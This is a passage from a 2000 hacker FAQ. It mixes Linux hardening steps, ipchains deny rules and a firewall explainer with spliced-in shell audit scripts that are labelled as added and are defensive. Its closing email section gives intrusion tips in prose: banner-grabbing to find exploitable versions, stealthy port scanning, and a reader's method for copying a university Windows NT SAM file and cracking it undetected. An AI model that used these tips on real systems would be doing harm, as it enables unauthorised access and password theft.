Inetd is a daemon which listens for TCP or UDP connections, and on connection, passes control to the appropriate service. Becoming familiar with the /etc/inetd.conf file is a good idea, as it is a likely place that an intruder would put a backdoor.

So, after opening the file you will need to comment out (using '#') the services that you don't need. After commenting out unnecessary services inetd needs to be restarted so the changes just made will take effect.
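Before commenting things out it helps to see exactly what inetd would still start. The script below is an added example, not part of the FAQ: it audits an inetd.conf passed as an argument and lists the enabled services, the ones that run as root, and the conventionally dangerous ones (the r-services, telnet, tftp, finger). It runs here on a constructed sample file modelled on the snippet above; point it at /etc/inetd.conf to audit a real box.

```shell
#!/bin/sh
# Added example (not from the FAQ): audit an inetd.conf for services that
# are still enabled. Every function takes the file to inspect as $1.

# Constructed sample inetd.conf (not a real system file), based on the
# FAQ's snippet plus two extra entries to give the audit something to flag.
SAMPLE_INETD="${TMPDIR:-/tmp}/inetd.conf.sample.$$"
cat > "$SAMPLE_INETD" <<'EOF'
# sample inetd.conf (constructed for the example)
ftp     stream  tcp     nowait  root    /usr/libexec/ftpd       ftpd -l
#telnet stream  tcp     nowait  root    /usr/libexec/telnetd    telnetd
#shell  stream  tcp     nowait  root    /usr/libexec/rshd       rshd
#login  stream  tcp     nowait  root    /usr/libexec/rlogind    rlogind
finger  stream  tcp     nowait  nobody  /usr/libexec/fingerd    fingerd
exec    stream  tcp     nowait  root    /usr/libexec/rexecd     rexecd
EOF

# Names of services that are NOT commented out, one per line.
# Blank lines and lines whose first non-space character is '#' are skipped;
# the service name is the first field.
inetd_enabled_services() {
    awk '!/^[[:space:]]*(#|$)/ { print $1 }' "$1"
}

# Enabled services that hardening guides normally want switched off:
# the r-services (shell/login/exec) and other plaintext daemons.
# The list is this example's choice, not something the FAQ fixes.
inetd_risky_services() {
    inetd_enabled_services "$1" \
        | grep -E '^(shell|login|exec|telnet|tftp|finger)$' || true
}

# How many enabled services run with root as the user field (field 5).
inetd_root_services() {
    awk '!/^[[:space:]]*(#|$)/ && $5 == "root" { n++ } END { print n + 0 }' "$1"
}

# Human-readable report combining the three checks.
inetd_audit() {
    echo "Enabled services in $1:"
    inetd_enabled_services "$1" | sed 's/^/  /'
    echo "Risky services still enabled:"
    inetd_risky_services "$1" | sed 's/^/  /'
    echo "Enabled services running as root: $(inetd_root_services "$1")"
}

inetd_audit "$SAMPLE_INETD"
```

On the sample the report lists ftp, finger and exec as enabled, flags finger and exec, and counts two root-owned daemons (ftp and exec); the commented-out telnet, shell and login lines are ignored just as inetd ignores them. Anything the audit flags that you do not need is a candidate for a leading '#', followed by the inetd restart mentioned above.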

Step 3 - Remove un-needed system users

Take a look at your /etc/passwd file, you will see that there are a lot of users on your system. Why do you want 'games' or 'guest'? They will probably have no password too...good eh?

Remove these users with "userdel -r username" command.

Step 4 - Prevent lilo from booting in "Linux 1"

Here is what we said about "Linux 1" in hack faq volume 4:

At the lilo (linux loader) prompt type: linux 1

The system will boot up and you will be in a shell. Now type in 'passwd' and when prompted enter a new password and then re-type it to confirm. You can now reboot the system and login as 'root' with the password you chose!

Obviously we don't want people doing this to your 'secured' linux box - so here's how we stop that trick from working:

Open /etc/lilo.conf

Add the following lines:

restricted
password=somepassword

Just replace 'somepassword' with a password of your choice (make it a good one). Basically, this will make lilo ask for a password whenever someone tries to pass additional parameters to it, like "linux 1".

Next thing to do is secure the /etc/lilo.conf file a bit better so that people can't just log in with their guest accounts and change the password. At the shell, type the following:

chown root.root /etc/lilo.conf

chmod 600 /etc/lilo.conf

That will make sure that root is the owner of the file, and that the permissions are set more tightly.

Step 5 - Use a basic firewall

A firewall is essential if you plan to prevent remote attacks. Redhat Linux comes with a firewall called ipchains which can filter and redirect packets for you. Add these rules to /etc/rc.d/rc.local to provide you with basic security and logging.

/sbin/ipchains -F
/sbin/ipchains -A input -i eth0 -p tcp -d 0.0.0.0/0 53 -j DENY -l
/sbin/ipchains -A input -i eth0 -p udp -d 0.0.0.0/0 69 -j DENY -l
/sbin/ipchains -A input -i eth0 -p tcp -d 0.0.0.0/0 87 -j DENY -l
/sbin/ipchains -A input -i eth0 -p tcp -d 0.0.0.0/0 111 -j DENY -l
/sbin/ipchains -A input -i eth0 -p udp -d 0.0.0.0/0 111 -j DENY -l
/sbin/ipchains -A input -i eth0 -p tcp -d 0.0.0.0/0 2049 -j DENY -l
/sbin/ipchains -A input -i eth0 -p udp -d 0.0.0.0/0 2049 -j DENY -l
/sbin/ipchains -A input -i eth0 -p tcp -d 0.0.0.0/0 512 -j DENY -l
/sbin/ipchains -A input -i eth0 -p tcp -d 0.0.0.0/0 513 -j DENY -l
/sbin/ipchains -A input -i eth0 -p tcp -d 0.0.0.0/0 514 -j DENY -l
/sbin/ipchains -A input -i eth0 -p tcp -d 0.0.0.0/0 515 -j DENY -l
/sbin/ipchains -A input -i eth0 -p tcp -d 0.0.0.0/0 540 -j DENY -l
/sbin/ipchains -A input -i eth0 -p tcp -d 0.0.0.0/0 2000 -j DENY -l
/sbin/ipchains -A input -i eth0 -p udp -d 0.0.0.0/0 2000 -j DENY -l
/sbin/ipchains -A input -i eth0 -p tcp -d 0.0.0.0/0 6000 -j DENY -l

These rules block connections to certain services which CERT says are dangerous. If you are on a dialup, replace eth0 with ppp0.

Step 6 - Look at your logs

The logs on your system are your way of knowing what is, and has been going on. Logs are located in /var/log.

Step 7 - Check for updates regularly

You will need to visit the homepage of your Linux distro regularly to get all recommended patches and updates. This will ensure that any vulnerabilities in the software are patched quickly.
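Steps 1, 3 and 4 above each leave something on disk that can be checked afterwards, so here is an added read-only audit script (my own example, not part of the FAQ) that verifies them: that /root and the .rhosts-style files grant nothing to group or other, that no account in the passwd file has an empty password field, and that lilo.conf carries both 'restricted' and a 'password=' line and is mode 600. Every function takes the path to check as an argument; the script exercises them on a constructed mock tree under $TMPDIR (the mock deliberately fails each check) and can then be pointed at the real /root, /etc/passwd and /etc/lilo.conf. It assumes GNU stat (stat -c '%a').

```shell
#!/bin/sh
# Added example (not from the FAQ): audit the results of steps 1, 3 and 4.
# Functions are read-only and take paths, so they run on a mock tree here.

# ---- constructed mock tree (not real system files) ----
MOCK="${TMPDIR:-/tmp}/linux-audit-mock.$$"
mkdir -p "$MOCK/root" "$MOCK/etc"
touch "$MOCK/root/.rhosts"
chmod 700 "$MOCK/root"
chmod 644 "$MOCK/root/.rhosts"          # deliberately too open (FAQ uses mode 0)
cat > "$MOCK/etc/passwd" <<'EOF'
root:x:0:0:root:/root:/bin/bash
daemon:x:2:2:daemon:/sbin:/sbin/nologin
games::12:100:games:/usr/games:/bin/sh
guest::500:500:guest:/home/guest:/bin/sh
alice:x:501:501:alice:/home/alice:/bin/bash
EOF
cat > "$MOCK/etc/lilo.conf" <<'EOF'
boot=/dev/hda
prompt
timeout=50
image=/vmlinuz
  label=linux
  root=/dev/hda1
EOF
chmod 644 "$MOCK/etc/lilo.conf"          # deliberately not 600 yet

# Octal permission bits of a path (GNU stat; BSD stat would use -f '%Lp').
mode_of() { stat -c '%a' "$1"; }

# Step 1: print one line per path that grants any permission to group or
# other. The last two octal digits are the group and other bits, so a mode
# is acceptable when it ends in "00" (700, 600, ...) or is exactly 0.
check_world_closed() {
    for p in "$@"; do
        m=$(mode_of "$p")
        case "$m" in
            0|*00) ;;
            *) echo "$p is mode $m (group/other bits set)" ;;
        esac
    done
}

# Step 3: accounts whose password field (field 2) is empty, i.e. no password
# at all - the 'games'/'guest' kind of entry the FAQ removes with userdel.
passwordless_accounts() {
    awk -F: '$2 == "" { print $1 }' "$1"
}

# Step 4: lilo.conf must contain 'restricted' and 'password=' and be mode 600.
# Prints "ok" or a space-separated list of problems.
check_lilo() {
    f=$1; problems=""
    grep -q '^[[:space:]]*restricted[[:space:]]*$' "$f" || problems="$problems missing-restricted"
    grep -q '^[[:space:]]*password=' "$f" || problems="$problems missing-password"
    [ "$(mode_of "$f")" = "600" ] || problems="$problems mode-$(mode_of "$f")"
    if [ -z "$problems" ]; then echo ok; else echo "${problems# }"; fi
}

# Run all three checks against the mock tree and print a report.
audit_report() {
    echo "== step 1: group/other permissions"
    check_world_closed "$MOCK/root" "$MOCK/root/.rhosts"
    echo "== step 3: accounts with an empty password field"
    passwordless_accounts "$MOCK/etc/passwd"
    echo "== step 4: lilo.conf"
    check_lilo "$MOCK/etc/lilo.conf"
}

audit_report
```

On the mock tree the report flags .rhosts (mode 644), lists games and guest, and reports "missing-restricted missing-password mode-644" for lilo.conf; after applying the steps above to the real files, each check prints nothing or "ok". Note that on distributions using shadow passwords the passwd field is 'x' for everyone, so an empty-field check only catches accounts with literally no password; the FAQ's advice to remove unneeded accounts outright still stands.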


A better look at Firewalls

What is a Firewall?

I explained this very very briefly in Hack FAQ volume 1, so here is a better description. Firewalls are far more common now than they were a couple of years ago. This is largely due to the increased amount of Internet users worldwide, and therefore, the increased amount of hackers on the net. It is a well known fact that even now, around 50% of businesses on the net have no idea about Internet Security or how to secure their systems from attack. Personal Internet users are even worse, largely due to their ignorance over how open to the Internet they really are. In fact, quite a number of personal users don't take any security precautions because they don't think a hacker would have any reason to attack them. This is the worst attitude you could possibly have!

A firewall is a system or group of systems that control access between two networks. Think of a Firewall as a system based on rules. When data tries to pass from one network to another, the Firewall will halt the transfer and check its rules to see if that kind of data should be allowed to pass through the Firewall, and if the origin of the data is trusted. A Firewall can be very limited by its rules, and some will only allow email traffic through them, thereby protecting the network against any attacks other than attacks against the email service. Other firewalls provide less strict protections, and block services that are known to cause problems. The other good thing about a firewall is that it can be used as a tracing tool. By this, I mean it logs all illegal attempts to access your system or pass unauthenticated data to it. A typical log would probably hold the time/date, IP/Hostname of the attacker, protocol of attack, type of attack, traffic generated etc.

Firewalls are not your one-stop-security-solution though! A Firewall needs to be used as an extra precaution. For example, a firewall will not stop you running a trojan attached to an email - or stop you from accidentally misconfiguring a CGI script on your server. Ok, so you might complain that, although it wouldn't stop you infecting yourself with a trojan - once the trojan tried to send data over your net connection, the firewall would stop it and alert you. Trojans DO NOT like firewalls :) . Anyhow, all I am saying is that you can't just expect to install a Firewall and be 100% secure.

Ok...now - there are actually two types of Firewalls:

There is not a great deal of difference, especially with today's Firewall technology...but:

Application level

Application level firewalls generally are hosts running proxy servers, which permit no traffic directly between networks, and which perform elaborate logging and auditing of traffic passing through them. Since the proxy applications are software components running on the firewall, it is a good place to do lots of logging and access control. Application level firewalls are often fully transparent to the user, and tend to provide more detailed audit reports than network level firewalls.

Network Level

These operate using rules which state the allowed source and destination addresses and ports in individual IP packets. One important distinction about many network level firewalls is that they route traffic directly through them, so to use one you usually need to have a validly assigned IP address block. Network level firewalls tend to be very fast and tend to be transparent to users.
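To make the "system based on rules" idea from the description above concrete, here is an added toy network-level filter (my own example, not part of the FAQ and not a real firewall). Each packet is described by protocol, destination port and source address; it is compared against an ordered rule table, the first matching rule decides, anything that matches nothing is denied, and every denial is written to a log with a timestamp, much as the '-l' flag in the ipchains rules earlier in this volume does. The rule table and the traffic sample are constructed for the example; only /8, /16, /24 and /32 source prefixes are understood.

```shell
#!/bin/sh
# Added example (not from the FAQ): a toy first-match packet filter with
# default deny and logging of denied packets.

# Constructed rule table: proto dst-port source-prefix action.
# "any" matches every source. Order matters: first match wins.
RULES='tcp 25 any ALLOW
tcp 80 any ALLOW
tcp 22 10.0.0.0/8 ALLOW
tcp 23 any DENY
udp 111 any DENY'

# in_prefix IP PREFIX: succeed when IP (a.b.c.d) lies inside PREFIX
# (x.y.z.w/n or "any"). Only /8, /16, /24 and /32 are supported, which is
# enough for the example and avoids bit arithmetic.
in_prefix() {
    ip=$1; pfx=$2
    [ "$pfx" = any ] && return 0
    net=${pfx%/*}; bits=${pfx#*/}
    case $bits in
        8)  [ "${ip%%.*}" = "${net%%.*}" ] ;;
        16) [ "${ip%.*.*}" = "${net%.*.*}" ] ;;
        24) [ "${ip%.*}" = "${net%.*}" ] ;;
        32) [ "$ip" = "$net" ] ;;
        *)  return 1 ;;
    esac
}

# Denied packets are appended here, one line each.
FW_LOG="${TMPDIR:-/tmp}/toy-fw.log.$$"
: > "$FW_LOG"

# filter_packet PROTO DPORT SRC: print ALLOW or DENY. Unmatched packets are
# denied ("default-deny"); every denial is logged with the rule that caused it.
filter_packet() {
    proto=$1; dport=$2; src=$3
    decision=DENY; matched=default-deny
    while read -r rp rport rsrc raction; do
        [ "$matched" = default-deny ] || continue      # already decided
        if [ "$rp" = "$proto" ] && [ "$rport" = "$dport" ] && in_prefix "$src" "$rsrc"; then
            decision=$raction; matched="$rp/$rport/$rsrc"
        fi
    done <<EOF
$RULES
EOF
    if [ "$decision" = DENY ]; then
        echo "$(date -u +%Y-%m-%dT%H:%M:%SZ) DENY $proto $src -> port $dport (rule: $matched)" >> "$FW_LOG"
    fi
    echo "$decision"
}

# Constructed traffic sample: proto dport src, one packet per line.
PACKETS='tcp 80 192.0.2.5
tcp 23 192.0.2.5
tcp 22 10.1.2.3
tcp 22 192.0.2.5
udp 111 198.51.100.7'

echo "$PACKETS" | while read -r p d s; do
    echo "$p $s -> port $d: $(filter_packet "$p" "$d" "$s")"
done
echo "--- denied packets logged in $FW_LOG ---"
cat "$FW_LOG"
```

In the sample, web traffic and SSH from inside 10.0.0.0/8 are allowed, SSH from an outside address is denied by the default rule even though no rule names it, and telnet and portmap are denied by explicit rules; the three denials end up in the log with the rule that produced them, which is exactly the kind of record the "tracing tool" paragraph above is talking about.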

Do I need a Firewall?

The chances are you do. Even if you only go on the net occasionally to browse and check your mail - it's better to be safe. If you have a permanent connection, or run your own web server - then you most definitely do need one! IRC users would also be wise to get one. The distinction comes when you need to decide what kind of protection you need. For most users (surfing, checking email, IRC) you will probably only need a free Firewall or a very cheap one...but others may need to spend a bit more.

Can I get a Firewall?

Yes - you can even get one for free. As with most things, you will probably get what you pay for - so it is worth looking around before you decide which Firewall you are going to use to protect your personal computer. Generally, a personal Firewall should:

Some cheap personal Firewalls (for Win) you might want to check out are:

BlackICE Defender is a cheap personal Firewall that seems to be fairly popular amongst net users. I have not tried this one myself, but I have heard pretty mixed reviews.

Conseal Private Desktop is a nice Firewall with a great interface, but it's a bit more expensive than most.

Sygate Personal Firewall is a free personal Firewall, and what I did like about this one is that it is completely invisible (i.e. no icon in the system tray etc.) - but that's just me - maybe you would like one that shows up so you know it's there :)

Zone Alarm is a free personal Firewall, which has got a lot of publicity and a lot of acknowledgement from net users. An easy to use Interface, and very little setup is involved.


Emails

Here are a few answers I have sent to individual people over the email recently:

How do I get information from a server that I telnet to, and does it matter what port I connect on?

Yes, the port you connect on will make all the difference. Each port is there for a different reason, and when you connect to a port a program (which is specific to that port) will run. These programs are usually referred to as 'daemons'.

Each port is assigned for a different task, for example:

Port 21: FTP (File transfer Protocol) - handles the uploading and downloading of files to and from the server.

Port 25: SMTP (Simple mail transfer protocol) - allows you to send email.

Port 79: FINGER - allows you to 'finger' users.

And so on...every port has a different use, but the most common ports are 21,23,25,34,79,80,110,1080,3128,8080

When you telnet to a port, and the daemon on that port springs into action - it will greet you with a message banner. These banners are a wealth of information - and the key to hacking a server.

In a banner, you will almost always be told the version of the daemon software that is running - and sometimes the version of the operating system. So, once you have the name and version of the daemon running - you can do a search on the internet to see if there are any known vulnerabilities or exploits in that version! For example:

If I connect to ftp.myserver.com on port 21 and get greeted with:

"220 Serv-U FTP-Server v2.5e for WinSock ready.."

I can see that this server is running 'Serv-U' version 2.5e. I can now go to my favourite vulnerability search engine (http://www.packetstorm.securify.com , or http://www.securityfocus.com) and search for that program. If it finds a good exploit - then we could possibly get access to that system. Also, look at the banner again - see the words 'for WinSock'? Well, that pretty much tells us that this system is running Windows (as opposed to another operating system like Unix or Linux).

This is why port scanning your target system is a good idea (as long as you do it stealthily, and in moderation), because you will be able to see which ports on the system are open for connections. Then you can go in manually with telnet and see what is running on the server.

Response to Hack FAQ's by MisterE

I've read your hacking texts and i think they're nice, though in vol2 i read you used netsplits to gain op in DalNet..only problem here is that DALNet uses ChanServers..so the chanserver will de-op you when you join the chan :( The trick does work for EFNet and IRCNet though. For EFNet you don't need a link looker, just join #netsplit, they have those installed for you. This is easier because linklookers are prohibited on most IRC servers.

Now..about the netsplit trick, i know that there are very few servers that still allow opping when a netsplit has occurred..only 5 or so for EFNet.

For the Nick Colliding, i know that it doesn't work for EFNet, most servers check the timestamp of a nick. The newest nick will be kicked off the server.

That's about the volumes i've read..here's a trick for the next volume(?):

I like downloading stuff at my uni..because they have a very nice connection there (T1). Problem is..that if i d/l-ed like 400 MB mp3, i don't want to put it on 1.44 MB disks..and zip drives also suck. So i bought myself a paradrive. It's a case for a normal Hard Drive that allows me to connect my 3.2GB HD to the parallel port of a computer.

The problem is..i need to install my paradrive. The Target machine is running WinNT. I don't like to have my drivers installed in NT itself..i'd need root access for that. (OK..i do have root access..but getting caught is disastrous here). So i connect my paradrive under DOS.

There are several options to do this:

1) boot from a win95/98 bootfloppy
2) create a NT bootfloppy using ERD Commander (http://www.sysinternals.com)

If booting from the a-drive is disabled, get into the BIOS (using the backdoor passwords mentioned in a previous volume of the Hack FAQ) and change it to boot from the a-drive.

Anyway..if you used option 1 you'll boot from the floppy, but won't have any access to the hard drives, because those use the NTFS filesystem. So you run ntfsdos.exe (also from sysinternals), which allows you to read from NTFS partitions. The registered version of ntfsdos also allows you to write to ntfs partitions.

OK..now i'm in DOS, can read the NTFS partition, so i load my paradrive drivers and copy it to my paradrive. Of course i could also get the passwd file of the winNT computer. If i remember this correctly it is located in some subdirectory of c:\winNT\system32. Look for files named 'sam' or '*.sam'. You cannot access these sam files when WinNT is running because there's a READ/WRITE lock on them. After obtaining the sam file you get L0phtcrack and bruteforce the root password.


Conclusion

Ok, so it took ages and ages to get this out - I can only put it down to writer's block :) As I mentioned, I have been very busy on the hacking challenges, and making our very own Wang Products hacking challenge called Mod-X, which isn't up yet - but I will probably send a message to the hack faq mailing list when it is. I am not entirely sure what it is going to involve yet, but hopefully it will be a good way for you to test what I have been talking about. I would be happy to receive more topics written by you if you feel in the hacker textfile writing mood. Also, there is no need to email me asking whether you can link to my site, or put these volumes on your pages - it's fine as long as you don't edit them in any way.

If there is anything I haven't covered and you would like me to consider putting into my next text file, please email me at: Wang@most-wanted.com - ALSO! if you have any other methods of solving the questions that I have answered, please send them to me and I will consider putting your solution in as well (with full credit to you obviously).

Wang
http://www.wangproducts.co.uk
http://www.wangproducts.net
22 October 2000